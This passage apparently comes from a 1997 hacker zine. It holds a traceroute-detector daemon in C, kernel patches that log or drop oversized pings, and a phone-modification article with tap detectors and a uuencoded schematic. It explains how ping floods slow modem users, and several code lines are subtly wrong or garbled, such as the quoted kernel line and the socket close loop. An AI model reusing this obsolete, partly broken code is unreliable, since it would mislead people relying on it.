+the same TTL (each packet to an increasing port number)  to determine the
+answering time of a host more accurately.  In reality, a traceroute output
+therefore looks like this:
+
+  traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets
+   1  localhost (127.0.0.1)  1.983 ms  1.304 ms  0.934 ms
+ 
+
+1.2 The strategy behind the traceroute-detector
+
+Knowing how traceroute works it is very easy to detect.  Simply set up
+sockets listen()ing to the ports 33434 and above and react if they receive
+any packets.  You can even try to guess how many hops the host that is
+tracerouting you is away by subtracting 33434 from the port-number you
+received the packet on and dividing the result by three.
+
+Listening to the port traceroute sends the probe-packet to also produces a
+funny effect: traceroute will neither get back an ICMP TIME_EXCEED nor
+an ICMP PORT_UNREACHABLE signal.  Therefore it will timeout waiting for the
+reply and put a * into your hosts entry.  Because of the timeout
+traceroute will *not* recognize that it already reached its target and
+continue sending probe-packets until the maximum number of hops is
+reached.
+
+With the little program detecttr running (and listening to ports 33434 -
+33434*30*3) a traceroute localhost looks like this: 
+
+   schnecke:/root # traceroute localhost
+   traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets
+     1  * * *
+     2  * * *
+     .
+     .
+     .
+     30 * * *
+   
+
+
+1.3 Problems detecting traceroutes
+
+The only problem with detecting traceroutes is that one might select
+another base-port number than the default or use another technique. 
+I have never seen any people doing this though.  So if just an average 
+idiot (or wannabe "hAx0r") is tracerouting you chances are really high 
+that you detect it.
+
+If you are *really* paranoid about traceroutes you should not use the
+ports to detect a trace but edit the file that deals with UDP packets.
+This /usr/src/linux/net/ipv4/udp.c
+
+(NOTE: this file is a part of the kernel. Recompile your kernel to make
+changes take effect) 
+
+Insert the line:
+
+printk(KERN_INFO "UDP: packet sent to unreachable port by %s !\n", 
+                                                  in_ntoa(daddr));
+
+before line 833: 
+
+ICMP_send(ski,ICMP_BEST_UNTEACH, ICMP_PORT_UNTEACH, 0, de);
+
+This will make the system log *all* requests to unreachable ports that are
+delivered through the UDP protocol.  Please note that the funny effect
+described in 1.2 will not occur (which can also be an advantage).
+
+BTW: Please be careful while editing the kernel - you need it :)
+
+1.4 Sample Implementation
+
+detecttr.c -> see the end of this file
+
+
+2. Detecting pings
+
+There has been a lot of discussion about ping in the last few months
+because it was often used to transmit oversized packets to other hosts
+resulting in crashes.  Although this bug has been fixed on most hosts
+already ping still is very popular to slow down people who are connected
+to the net through modem lines until they drop carrier themselves because
+of the BIG lag.
+
+You can *not* prevent people from pinging you (without having your ISP
+blocking all ICMP_ECHO requests to your host) and therefore causing
+traffic on your modem line.  But you can actually detect *who* pinged you,
+determine the ping-packet size and decide not to reply (this *may* reduce
+the data over your modem line up to factor 2).
+
+2.1 How does ping work and how do people slow down others by using ping ? 
+
+Simplified ping sends a packet containing an ICMP_ECHO and some data to the 
+target which will reply with an ICMP_ECHOREPLY packet that contains the data 
+sent to it (only some fields are modified).
+
+Normally ping will wait about 1 sec before it sends the next ICMP_ECHO.  On 
+many implementations of ping you can bypass this and do a "floodping" which 
+will *not* wait but just send the packets as fast as possible.  If you choose 
+a big packet size for the ping packet and you are pinging your victim from a 
+host with a fast connection (T1 or Ethernet) this will cause a lot of traffic 
+on your victims modem line and therefore slow him down to a halt. 
+
+2.2 How can I detect a ping and how do I prevent being flooded ?
+
+Since a ping is nothing more than a ICMP_ECHO with some data appended to it 
+you can simply intercept it, extract the senders address and the packet size 
+from it and decide whether you want to reply or not.  For non-floodpings you 
+can reduce the amount of data transferred over your modem line simply by 
+choosing not to reply.  But if someone is floodpinging you it does not help 
+much to not reply to the ping packets --> the incoming ping packets will 
+probably cause enough traffic to slow you down (unless the host where 
+floodpings come from is has a slow connection).  At least you can give it a 
+try anyway... 
+
+2.3 Sample implementation
+
+The handling of the ICMP_ECHO is done in the kernel. Edit your 
+/usr/src/linux/net/ipv4/icmp.c file and search for the section "Handle
+ICMP_ECHO".  These 16 lines of code are all you need to modify to defend 
+yourself against / detect ping-floods. 
+
+If you know a little C you can easily see that there exists a define
+"CONFIG_IP_IGNORE_ECHO_REQUESTS" which you can set to have the kernel just
+ignore all incoming ICMP ECHO_REQUESTs. But we want to be more selective.  We 
+want to log all pings that are sent to our machine. We do this by inserting 
+the line
+
+printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n",in_ntoa(saddr),
+                                                    icmp_param.data_len);
+
+before the #endif.
+
+You can easily change the "Handle ICMP_ECHO" section so that your machine
+only replies to ICMP ECHO_REQUESTs that do not carry too much data and
+ignore the pings with big packet sizes: 
+
+<++> DTR/icmp.patch
+static void icmp_echo(struct icmphdr *icmph, struct sk_buff *skb, struct device *dev, __u32 saddr, __u32 daddr, int len)
+{
+#ifndef CONFIG_IP_IGNORE_ECHO_REQUESTS
+	struct icmp_bxm icmp_param;
+	if (len <= 1000) { /* we only reply to pings that do carry less than 1k data */
+		  icmp_param.icmph=*icmph;
+		  icmp_param.icmph.type=ICMP_ECHOREPLY;
+		  icmp_param.data_ptr=(icmph+1);
+		  icmp_param.data_len=len;
+		  if (ip_options_echo(&icmp_param.replyopts, NULL, daddr, saddr, skb)==0)
+		      icmp_build_xmit(&icmp_param, daddr, saddr, skb->ip_hdr->tos);
+		  printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n", in_ntoa(saddr),icmp_param.data_len);
+	  }
+	else 
+		printk(KERN_INFO "ICMP: possible FLOOD DETECTED by %s, packetsize = %d \n", in_ntoa(saddr),len );
+#endif
+	kfree_skb(skb, FREE_READ);
+}
+<-->
+
+<++> DTR/detecttr.c 
+/*
+ * detecttr.c - by whynot AKA baldor (whynot@cyberjunkie.com)
+ * created: 08.05.97
+ * last modified: 11.07.97
+ * Platforms: Linux, FreeBSD should work with other POSIX-systems too.
+ *
+ * Compile:
+ * just the usual "gcc -o detecttr detecttr.c" for GNU C and 
+ * "cc -o detecttr detecttr.c" for other compilers...
+ * 
+ * Usage:
+ * Just run this program at the startup of your machine - it will stay in
+ * the background until someone traceroutes you. It only uses a *tiny* bit
+ * of your memory and nearly 0% CPU :)
+ * 
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <string.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <sys/socket.h>
+#include <sys/wait.h>
+#include <sys/time.h>
+#include <sys/signal.h>
+#include <sys/syslog.h> /* simply comment this out if you don't have syslog.h */
+#include <netdb.h>
+
+
+#define MAXBUFLEN 200
+#define MYPORT 33435
+#define NUMPORTS 30*3
+
+int sockfd[NUMPORTS];
+
+
+void shutitdown()
+{
+
+	int w;
+	char buf[50];
+        for (w=0; w<NUMPORTS; w++)
+	    close(sockfd);
+        sprintf (buf,"DetectTraceroute terminated\n");
+	syslog(LOG_NOTICE , buf);
+	
+	exit(0);
+}
+
+char *getname (struct in_addr addr)
+{
+	struct hostent *h;
+	int w;
+	char foo[4];   /* the 4 numbers as ASCII-Values per char */
+	int tmpint[4]; /* used to convert from a string to 4 numbers */
+	char tmpbuf[20];
+	
+	sprintf(tmpbuf, "%s", inet_ntoa(addr));
+
+	if ( sscanf(tmpbuf,"%d.%d.%d.%d", &tmpint[0], &tmpint[1], &tmpint[2], &tmpint[3])  != 4) {
+		printf ("Error while detecting hostname !\n");
+		exit(1);
+	}
+
+	for(w=0; w<4; w++) foo[w]=tmpint[w];
+	
+	if ( (h=gethostbyaddr(foo, 4, AF_INET)) == NULL) {
+		herror("gethostbyaddr");
+		exit(1);
+		
+	}
+	return  h->h_name;
+}
+
+main(int argc, char *argv[])
+{
+	int hops;
+	struct sockaddr_in my_addr;
+	struct sockaddr_in remote_addr;
+	int addr_len, numbytes;
+	char buf[MAXBUFLEN];
+	int w;
+	fd_set readfds;
+	
+
+	if( fork() !=0 ) return(0); /* we don't want to use that annonying & */
+	
+	
+	signal(SIGHUP, SIG_IGN); /* ignore SIGHUP */
+	
+	signal(SIGTERM, shutitdown); /* clean shutdown */
+	
+	for(w=0; w<NUMPORTS; w++) {
+		
+		if ( (sockfd[w] = socket( AF_INET, SOCK_DGRAM, 0)) == -1) {
+			perror("socket");
+			exit(1);
+			
+		}
+		my_addr.sin_family = AF_INET;
+		my_addr.sin_port   = htons (MYPORT+w);
+		my_addr.sin_addr.s_addr = htonl(INADDR_ANY);
+	
+		bzero(& (my_addr.sin_zero), 8);
+   
+		if ( bind (sockfd[w], (struct sockaddr *)&my_addr, sizeof (struct sockaddr) ) == -1) {
+			perror("bind");
+			exit(1);
+		}
+	}
+
+	FD_ZERO(&readfds);
+	for(w=0; w<NUMPORTS; w++)
+	    FD_SET(sockfd[w], &readfds);
+
+	
+        sprintf (buf,"DetectTraceroute successfully started\n");
+	syslog(LOG_NOTICE , buf);
+
+	while(1) {
+		select(sockfd[NUMPORTS-1]+1, &readfds, NULL, NULL, NULL);
+		
+		for (w=0; w < NUMPORTS; w++) {
+			if (FD_ISSET(sockfd[w], &readfds))
+			    hops = w;
+		}
+		
+		addr_len = sizeof(struct sockaddr);
+		
+		if ((numbytes=recvfrom(sockfd[hops], buf, MAXBUFLEN, 0, (struct sockaddr *)&remote_addr, &addr_len)) == -1) {
+			perror("recvfrom");
+			exit(1);
+		}
+		
+		/* we use buf for misc stuff  O:-) */
+		sprintf (buf,"TRACEROUTE from IP %s. Hostname: %s  HOPS: %d", inet_ntoa(remote_addr.sin_addr), getname(remote_addr.sin_addr), hops / 3 +1);
+		syslog(LOG_NOTICE , buf);
+		FD_ZERO(&readfds);                   
+		for(w=0; w<NUMPORTS; w++)
+		    FD_SET(sockfd[w], &readfds);
+		
+	}
+}
+<-->
+
+0x5>-------------------------------------------------------------------------
+
+      |  |||| |||||[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
+|       | | ||| |||[ The Street Phreak's Phone Mods vol. 1 ]
+    | |  ||||||||||[               Jex {612}               ]
+      | | |||| || |[      <jex@teenworld.poboxes.com>      ]
+  |    ||  | ||||||[_______________________________________]
+
+[intr0]
+
+97.07.01
+
+  This project is a result of a need to have a more versatile phone for at 
+home and in the field.  Many "phone modification" files have been floating 
+around the scene for quite some time - some are incomplete, inaccurate, or 
+would be better taken advantage of if they were all integrated.  This project 
+should be a good starting point for making your phone elite.
+
+  The following modifications are divided into two primary parts:  The first
+being made to your phone directly, and the second being as a separate
+component.
+
+[part 1: m0d me]
+
+Teq:
+----
+2  1/8" mono jack (or stereo with tips tied)  274-274    2/$1.89  U1, U2
+2  SPDT slide switch                          275-409    2/$1.19  SW1, SW3
+1  100k single turn pot                       271-092      $1.29  R2
+1  Mini red LED                               276-026    2/$0.99  D1
+1  Hallmark Digital Greeting Card (optional)  (Hallmark) 1/$8-10  IC1
+1  6v power source                (optional)
+1  SPST normally closed momentary (optional)  275-1548   4/$2.89  SW2
+1  10k                            (optional)  271-1335   5/$0.49  R1
+
+
+  Since I'm cool, I'll give you a rough walk-through on the construction along
+with the schematic.  The phone modifications were kept to a minimum, since you
+most likely want the majority of your cute toys in the modular component.  I
+would like to make these devices modular as well at some point in the future 
+- if anybody would like to beat me to it, by all means.
+
+
+--[ring switch]----------------------------------------------------------------
+
+1. Desolder wire off one pad of the piezo element (ringer)
+2. Connect desoldered *pad* to right pole of SPDT
+3. Connect desoldered *wire* to center pole of SPDT
+4. Connect LED to left pole of SPDT
+5. Connect other side of LED to the pad of piezo element with the origional
+   wire
+
+(Note: You should now be able to select between an audible ring and the
+       flashing light.  If the LED does not light but the ringer works, switch
+       the wires going to the LED as the anode/cathode are not in the right
+       positions.)
+
+
+--[in jack]--------------------------------------------------------------------
+
+6. Desolder wire (-v, probably black) off one pad of the microphone
+7. Connect desoldered *wire* to center pole of SPDT
+8. Connect recently desoldered *pad* to right pole of SPDT
+9. Connect tip (or base) of U1 to left pole of SPDT
+10. Connect base (or tip) of U1 to the center pole of R2
+11. Connect side pole of R2 to the pad of the mic with the original wire
+
+(Note: You should now have the ability to switch between the audio jack and 
+       the mic.  This is necessary as the audio jack always drowns-out the mic,
+       even when it is doing something such as playing "UN-noise" while a tape
+       rewinds.  This also serves as a mute switch.)
+
+--[out jack]-------------------------------------------------------------------
+
+12. Connect U2 in parallel with the speaker.
+
+(Note: Out jack.)
+
+
+--[optional digital recorder]-------------------------------------------------
+
+13. Desolder mic from Hallmark card (IC1), it will not be used
+14. Connect desoldered mic wires to the base and tip of U2 in parallel
+    (isolated)
+15. Desolder speaker from IC1, it will not be used
+16. Desolder one speaker wire, it will not be used
+17. Connect the other speaker wire to R1
+18. Connect other side of R1 to the mic pad that has the original (v+) wire
+    and R2 connect to it
+19. Desolder "play switch" paying attention to how it is connected, it sucks
+20. Connect SW2 in it's place
+21. Connect v- (black wire) of 6v power source to SW2
+22. Connect v+ to IC1
+
+(Note: You should now be able to record from the mic and jack, and be able to
+       play it back into the phone.)
+
+
+[part 2: c0nstructi0n 0f p0w-paq]
+
+Teq:
+----
+8 DPDT slide switch                           275-403    2/$1.39  SW1, SW2,
+                                                                  SW3, SW6,
+                                                                  SW7, SW8,
+                                                                  SW9, SW12
+2 SPST slide switch                           275-401    2/$1.19  SW4, SW10
+2 DPST slide switch (substitute with 2 DPDT)  275-403    2/$1.39  SW5, SW11
+2 Dual polarity LED (phreakz discretion- 2                        LED1, LED3
+                     LEDs in parallel, or a
+                     2 pin Dual LED package)
+6 6P4C Modular Jack (try DigiKey, www.digikey.com)
+
+
+Parasitic Tap Detectors:
+------------------------
+2 15v Zener Diode      276-564   2/$0.99  D2, D4
+2 Mini Red LED         276-026   2/$0.99  LED2, LED4
+2 Bridge Rectifier     276-1161a 1/$0.99  D1, D3
+
+(Note: I substituted the 1N914/4148 Silicon Diode for the Zener and it seems to
+       work fine, 276-1122, 10/$1.19)
+
+
+  As you may of noticed, the Parasitic Tap Detectors are taken straight from
+the article Tap Alert in 2600 vol 13 iss 1, credit is given to No Comment and
+Crash Test Idiot.
+
+  Now, what all this is.  You have two primary inputs, and one master input in
+case you have a single connector with two lines on it.  There are two
+"outputs", whose function is up to you (these are optional).  Now you are left
+with one master output, whose function should be obvious.
+
+  SW1 & SW7 change between the "outer" and "inner" wires, in other words
+Red/Green vs. Black/Yellow.  SW2 & SW8 reverse polarity of the line (one is
+optional).  SW3 & SW9 serve as polarity detectors, lighting one color for a
+certain polarity and another color for the other polarity (one is optional).
+SW4 & SW10 make use of the tap detectors.  Most of the time you will not be
+using the tap detectors as they can have problems with the other devices on the
+line, experiment.  SW5 & SW11 are primary line power switches, make the line go
+off or on.  SW6 & SW12 are hold switches for each line, when they are both "off
+hold" you may conference the two lines.
+
+  The polarity changers are a must - often times store-bought telephone cables
+reverse voltage, and even your wall jack might have non-uniform polarities.  To
+use both lines at once, the polarity for each line must be the same, this can
+be achieved by throwing just one switch if they are reversed (it's an either/or
+state).
+
+  If you find any errors or corrections you would like to make, or you just
+need a shoulder to cry on, my email is listed above.  Any upd8s can be found at
+http://www.geocities.com/SiliconValley/Heights/1334, thanks for playing.
+
+
+[schematix]
+
+  The top of the diagram has the modifications to be made to the phone unit
+itself, the bottom to the modular device.
+
+begin 644 phonesm1.gif
+M1TE&.#=A4@-9!O<       $! 0(" @,# P0$! 4%!08&!@<'!P@(" D)"0H*z
+M"@L+"PP,# T-#0X.#@\/#Q 0$!$1$1(2$A,3$Q04%!45%186%A<7%Q@8&!D9y
+M&1H:&AL;&QP<'!T='1X>'A\?'R @("$A(2(B(B,C(R0D)"4E)28F)B<G)R@Hx
+M*"DI*2HJ*BLK*RPL+"TM+2XN+B\O+S P,#$Q,3(R,C,S,S0T-#4U-38V-C<Ww
+M-S@X.#DY.3HZ.CL[.SP\/#T]/3X^/C\_/T! 0$%!04)"0D-#0T1$1$5%149&v
+M1D='1TA(2$E)24I*2DM+2TQ,3$U-34Y.3D]/3U!04%%145)24E-34U145%55u
+M55965E=75UA86%E965I:6EM;6UQ<7%U=75Y>7E]?7V!@8&%A86)B8F-C8V1Dt
+M9&5E969F9F=G9VAH:&EI:6IJ:FMK:VQL;&UM;6YN;F]O;W!P<'%Q<7)R<G-Ss
+M<W1T='5U=79V=G=W=WAX>'EY>7IZ>GM[>WQ\?'U]?7Y^?G]_?X" @(&!@8*"r
+M@H.#@X2$A(6%A8:&AH>'AXB(B(F)B8J*BHN+BXR,C(V-C8Z.CH^/CY"0D)&1q
+MD9*2DI.3DY24E)65E9:6EI>7EYB8F)F9F9J:FIN;FYR<G)V=G9Z>GI^?GZ"@p
+MH*&AH:*BHJ.CHZ2DI*6EI::FIJ>GIZBHJ*FIJ:JJJJNKJZRLK*VMK:ZNKJ^Oo
+MK["PL+&QL;*RLK.SL[2TM+6UM;:VMK>WM[BXN+FYN;JZNKN[N[R\O+V]O;Z^n
+MOK^_O\# P,'!P<+"PL/#P\3$Q,7%Q<;&QL?'Q\C(R,G)R<K*RLO+R\S,S,W-m
+MS<[.SL_/S]#0T-'1T=+2TM/3T]34U-75U=;6UM?7U]C8V-G9V=K:VMO;V]S<l
+MW-W=W=[>WM_?W^#@X.'AX>+BXN/CX^3DY.7EY>;FYN?GY^CHZ.GIZ>KJZNOKk
+MZ^SL[.WM[>[N[N_O[_#P\/'Q\?+R\O/S\_3T]/7U]?;V]O?W]_CX^/GY^?KZj
+M^OO[^_S\_/W]_?[^_O___RP     4@-9!@<(_P !"!Q(L*#!@P@3*ES(L*'#i
+MAQ C2IQ(L:+%BQ@S:MS(L:/'CR!#BAQ)LJ3)DRA3JES)LJ7+ES!CRIQ)LZ;-h
+MFSASZMS)LZ?/GT"#"AU*M*C1HTB3*EW*M*G3IU"C2@7PKZK5JUBS:MW*M:O7g
+MKV##BAU+MJS9LVC3JEW+MJW;MW#CRIU+MZ[=NWCSZMV;%B'?OX #"QY,N+#Af
+MPX@3*U[,N+%CKGX?2YY,N;+ERY@S:][,N3/D@YY#BQY-NK3ITZA3J\X:>;7Ke
+MU[!CRYY-NW;FUK9SZ][-N[?OWZYQ Q].O+CQX\B3EQ6NO+GSY]"C2]?,?+KUd
+MZ]BS:]].MCKW[^##B_\?O]L[^?/HTZM?[]@\^_?PX\N??]8]_?OX\^LG;W^_c
+M__\ !DA<?P(6:."!"))&8((,-NC@@X8M".&$%%9HH5H27JCAAAQJF&&'((8Hb
+M8H ?CFCBB2BJ5V**++;HXG0KOBCCC#3Z%F.-..:H8VHW[NCCCT!:UF.01!9Ia
+MY&!#'JGDDDS"E6234$8IY5=/3FGEE5%6B>667 :I99=@ACGCEV*6:>:(9)ZIz
+MYIH5ILGFFW >Z&:<=-:9WYQVYJGG>GCNZ>>?W_4)Z*"$1B=HH8@F6MRABC;Jy
+M:&Z,/BKII*M%2NFEF(9F:::<=EK9IIZ&*FIBH(YJZJE_E8KJJJS.I6JKL,;_x
+MVA=HLM9J*V.OWJKKKE;ERNNOM?H*[+"L"DOLL:,:B^RRG"K+[+.3.GO?!VI1w
+M&Y:U;WV@;;700BLM?=B>%:Y7X[I5+EGG=@OLM_.E>YF[ZL;;%;OQE:MMN/?^v
+MLVU5^6*U[;[]7A7PO_OR&[!5\.J+K[4'*TQMP0YC>R_$\D9+JX[C2NPOPP+[u
+M:[#''?.+L,9994QNR2%O+#+$#Z=<L<4&^8@OR")K-3/"-.L+\LT1FWRRSC[Gt
+MW#/!";^<*+WP\5SSTCDKK3/.(=_L=-$/M^PRU%C;3+'1C2+]7M!!"\UPV$^7s
+M+?7(0FO]\=5,,VUUVUPKZO77&R\\\<@'_XLWRP7W_^LWP08WC'+9/>_--\!Wr
+MQRWIW.P5C9;CBD?NY,5H7@M7XI)GCA?CV%&E^>>54BZBYZ"7;AKGUY%N^NJ:q
+MBAZBZJS'3IWKE)T+N62VVPP98EN;*WN\J.L^^-Y/3RPQYA$G[W#@1"._E>"$p
+M9XT5[);+=7M9U_]N:_ "8VZ\VTZ;#3[A8-<,><;>.U\5]6!E+Y;[[VO?+?=Io
+MB]_T\&_C/#74'+<O?/WKP][WN@<OHG6,8@.K&OH0*+]GT4]_'NL?5^P%P?]%n
+MCX)CH:#)TL6^KZ2+9,\#(<"P=CS^*0U^C_K;V,YGM\ 5SG $;-\ MW8W!2XOm
+M3 ]<603AEK;$??!J&(S?#O\/N)4._DQL$]P9_Y1HP@'RT%3[N]8)28C$)UI0l
+M82X;H16ME,/J)9&)/Y1>$+W8%[/DCFUB7)H$S1>UKJ PA4",'PCMY[8X^H^(k
+MT2O>%KE(.]$LC&TD^V,4T>A&MABQD%3<8M\224>>3;&(H1KDS^9(R2P"<'AZj
+MS&,%R]3%]^4M?6-C'@'MUK?>:0UZ8SFD&QN&2OV5TH8NC&4"63:O2-K1@VI,i
+MV2/;YJY'KE%E;RQ2)YNCRKD$4URU])0D5[E(1I+OEI@DI15_V:5A*J>8<5%?h
+M7>"%344M\WEM9"39YE@R$89S;>3DDC63T\W@B IY3CRE+&=YN,/)\'@K%&4Lg
+M-7G_I74BIYV5:J"N_'D<@*K&H )M5A\YA%#4-#2AER*H<1YZ.H@&:Z$;HFAIf
+M-&I11TET43;J:*P^.J"0BK15)!T.1T>STI,6*J7 :2DX/^728F'40X]S7BN)e
+M9[CF'5,K,JWIGV#Z&XVFTW%G9.,>ER-45!'5I,A,(RX'MTM#-O543^V-4:'Yd
+MQ;I5=2U!O6J>LDJ7A"AFJU(]8B:_BB%93:4@;")K6V)61+H&!JV\O*-2]\K/c
+M^K@U-F$%DES10I!9"215:3FJ7C.YUY].[Z^P">R/!MN=PTY.LKL3ETZUV5,%b
+MUI"S91PI8.-Z4]E8MBZG12U443K:-5&62IC]C%UBBQG:_^[)MJ0BK5UMD]J]a
+M]/8MN)U7:5T%V=<$ET:OA21A8GO<JQ06J+^=;7'=Z=KA.O0PF&UN ,,27>**z
+M-K*ZA6MMM L6R3:WN\F\"WGAM%[!M)=%R>W5>[T2V.-2%+UNF:^:],L7_IHHy
+MOO_P;WJM*MVVJO:[Q@WO<\'[F*#B5J:V%;"8)+RYAO33NIJB#(0+#-8#LW=Sx
+MK1UPEC#<&0J7E\#>G6M9XW3>$&=V2I0U,7<[G&+GAC8N,@:1=G.\8OI>>+<\w
+MJBV-Y<(^]*J2N6\B+X]KK%P8DY@Z4+ZQD^H:W6)F-Z[]=7&3I237)<^8L/CUv
+M*W0'PAHJ$=FUB&6PB*%$5B^+!?^A7^H@D+%IWOT"QLU3]C$?@;Q1SQA4(2JFu
+M\H(#?.(\<_*N6@;JC\5[&CR_.95F13%K+D9G')M)OX[.KYGWS.B*9IB["Y'Tt
+M],Q::4.#B;^9#O2:F_345'\9MH >\J1CO6E-XW"YB2XSIP>MH%[#.M12GG5's
+M9+TE ;N:V(K>-9D]+9JEO)K0!E:GL0'+$"P1]=C/%C2MQ:QMN'93=2O%MH#"r
+MS&'J[O?)DQ%WML<<Z6@+6[S?MK&[3SU?=7/[3#"U=ZT_LVW"\IO1I>X5LNF=q
+MY@17E\\E/NBO$6X6(U(NX-L-=HB<F$Y#*CG7.$1W@Q5>WDX/?'V\AK:>!3YOp
+M$57<L=#_S8N^F7IPC_N9XZ ^,[N3/?*(^QM%)T=M<%?>'04ON]GF=B^5MTQTo
+MD=_\1(I5;X0Q+IB=(HBD/"\TKB?]XJK;_-XC4A_*8RYS@]\E7Z"LN#P]BS@5n
+M@A8Z'XWZNN^LZZ(_MNU'-]$OMPYI2ZN9+LT<IP?-N40=,K9S&L?5W85N:[ACm
+MW>3B3%58U;[VRX5S[E/-9=_1N51B!GXQC-\WD@K_=HF#Z&]#N^N&!V_,#0(-l
+M;3*,9ATK_YRTDY[P)2>YYV\;[K?^_.LC;!GZI(C/9DJ>.Z[W>H3N>\APQY[+k
+M%#9^:$RO>TQ>D9K/9+US@A]T[#9<\]>/.Q]S>WS,T+*49DL8_RTU6<E 7?ZLj
+M3'=O.\EM],,_VMH\5KYG/"M.4T;0[*-L(?#/SWWAD^K(Z_=QV,=F7B9_ID)]i
+MU7=6/Q=R->=^ \@D[ =[VB<J"!A0&A:!-#>!#V@@]F([=(>!$NB G5*!,)> h
+M+/=^#<)*>15^L-1Q--5]"L5PMY%^?0:#AH=WW[%+CB0]LB4D AB#+K<9F;>!g
+MS*:!;N=)].="3A=#9+="97=VG*&#NE1Y(&A]-H@I)!ADK]=S4B= D[=ZY,)Wf
+MC;56J"&%5%0T58@8!I@L_*>&6WA=5]A^Z/)X8(A(O_=W6D1WO&-)8*@W=95Pe
+M<4@I6=AHIO6#5V=&S!=]>Z=ZBJB'BO]AAI)W+FF(>8:(A6UHA<%A$L,G@\[5d
+M1PZ'@7YS>N'#3##4AZOA,Z@XA9VH7JP8B# 3A%%F@G:W>1E8B[)WB_)%.OB5c
+MB/F#5$QT/]+G??#D@3$$-Y/(=1YFA/0QA&5UB1'RAL U=;;8>7!79$>(1:Z$b
+M>I4W?DDUBH929SM7B>_!C,W(B9=!CM<8C2%X@[BH:W)F=:[D>[TG?LHSC)_Da
+MB./E8(<XB\H8'^CH*L[XC!;8BHBV:OMH8^]HD&,B?^'HBNA19+"8C^9XCK+(z
+MCP5WC0 (C]2X(\=H= TY>UHUB>9AC1L)*0%9&/\H;P3)=@IY9 IYD#E2A;WUy
+MD?W(6Z<%@@G_69)R").F=9(H68+E=I'3R)/XY9)&$H$DF8PBR%OIJ)-7EY-.x
+M.1LIE9([R619UI*[4WP-2"1A!I56>8*KI9);V7E>&974-I%"1HAZX5]:>814w
+M890:"2[Q1$]+V'!EV8X6F7UA:99X*6\.]Y*1Y9,_J98J-YCL*)8!9&6 *1]Gv
+MHU30-U>PTY9*J9=:M9B*^9=CV9-H29&$"6*&V9?4^);(*%\",C.F]W=$YCEPu
+MV6,@21N*:9F2&9=G&9&<08[KE7RT.6H,*%P@QX%XE#7XV(/"11)@97L.0815t
+MB9A#R9.!N9F<Z6MK&9+)F1\S!(P5-IW862"Q*9O,.9T=V6R"*9! _W>5>^D?s
+M8Z2(.J><ZID@VYF.\:9H5-EQSOF<G^9;,>6;^'-)D+F<\0F'3=F7 $4]JED>r
+MX2F>@$B>E5F:@L-*]H<A[=F=VBF@ 7J8P[F !#J?]%F;+%F>P@1QH,D@EB62q
+MN<F%)HFA&3J#&YJ@2H*3%.H@WPFA)&J3)GJB/EB0'.HC(LF7,E)GNC%8]H9Jp
+M]]FA4M:?TY>74EF@;HBB-JJBD]52NN@E1JJ9(UJ?+[B./2I8BP>C+<*C)3JEo
+M5"H9TU94.'IE1$I,43J;N]F9[6&@O%&FBQ)A;LI.9]J<7CJ>:\JFY1&3<7HGn
+M<VI<2"IXC6%B>YJ9+_*B,-:GF3BC)19__?_'I'IJ)UPJHW5:@YA8J6WJ)8,Zm
+MCH@:.HKZI58JC8XZIA]F:A(YJ45X9TN6J=SYJ&A&JJ[YI^GV7H;*FJ&*J7;Fl
+MJD?:J0JR8XZFJO_)D;X*'I%:JFGZJK.5:L':HK9Z:[@JI<4JD9=5HS=ZE,G:k
+M.9MZ4+ JA+=76;.*H)>Z?<5VK3R2K7[&<+KZF=]Z8=8FK@Y%KJ?CKBIGG,<Ij
+M;5S$KHT&KV+U=-6*=O;ZKN>:KQFUKX;2KQN%KP#[']U:(\/ZJO^J&\%YL,W(i
+MK.K8I<^:&'/Y67@C2DWHA&%D///(/& 73S<$L?4AL-;:K&BZK;B35MB(AVLDh
+MAL#)AS%+3F)'LKS_>6D$NZL-JQ<TBT?YXY@T,T9?)4&01T@V2W6W.K&26K$6g
+MR[)6\[.C%+155(?*PU4/JST)RY4YRU(&6RT+VD9OXT.\]+7Y5T5D<T%'*YQ8f
+MAK)TRK1[F$=G\[/EAYIH.U,QVTCZ";%9>R0+FZNF2A@]2T(O>[=T!+==54>0e
+MF+:]":E;"YX[BQ>@5S@#PU-#DT\MNT"8R[$^M4"*2YIZTK?.JK+*<;6=2ZC)d
+M<J%_RQND6[J+.8*HZ[:LZQ\F2R')"F"Q^W+%\KJB>[MRDKL]VK6\>[)8I;M[c
+M&[SI4;Q&HD(UF:BI:[SX,;OCX8V-E[+(Z[P/>28>^X642:R[:[V]2R>/_XF"b
+M2]N]WFL@T!L>#3J];4N^Y:N=X"MJ#-N\[7L?YPL@M0N\\YLZKON[CYN_*K*_a
+M%,N^_HNP #R^U3O X<%CQW0[CEB7=GBE_"N_"*RIC\@M9)0M%IRG$0R[$[R,z
+MB[&Z7[<=]]N_'2P>.=:!^-2R(XLV95=.H72/215"W;-/RU-/92N$Q%N_)6RIy
+MA5$^J*=W*ERWQ9-S>2NTY;0RC1F,Z+?! KS#'MRT:=5+,DNUO5B*1KM$9YNYx
+M+8R[ 7S 3BR\AS%(4DRX5!Q]X4,U6)3%19R^&\?$7OS%UG'"4LN#4L5 JIC$w
+M-+2(07R>9GS%8)K#<$PB'UPW/77#'_.Q&7M#RO_[2NG[LCYTL8P,PK3*O6\<v
+MR -;P<8$(2,LP<RBP],:&'H(A>,&R*;CR9\L-Z0,.J9\RD>3RIJSRJR,*)O,u
+MP=YRJ(_AP*3HQV'\L)(,EI0,RS@"S+$,N&UQMFN!C[P<J*ZL.,(\S(.!<JN+t
+MS#@(J%W<S(6ZKI.!PM(TPRE\R A4-<QTCZNTPN!<C&G\S7:\Q-4L.=;LS$TWs
+MPW0<2&$CCVOSP,YTQ&I$M()K0E.<I.O,S.I4._D7R65\M]++@\:\@H'TBT,\r
+ME]1LP.V,(A'MSJ!,2$DLQ'U,QSUT2:G(5WBH2 _]R\?"OL57R6TBT'Q80N8Sq
+MSW>,QI-70&(8TZI(M3S_[+>TS(:Z>)<!=I,3/9#+FUCVV$+@]X2PE$!]%;6)p
+MG$2S-+)+S=1YH\QNW--/5W0Z+=7^^=.C0;J]K-'H&K\W'2J8"9-A+5CBV!FBo
+M[+5LC,$A[=5-;!PQG!G0$T8U[9>K:M64BM4!'=77\=8U!+)^33Q%3=25:X=\n
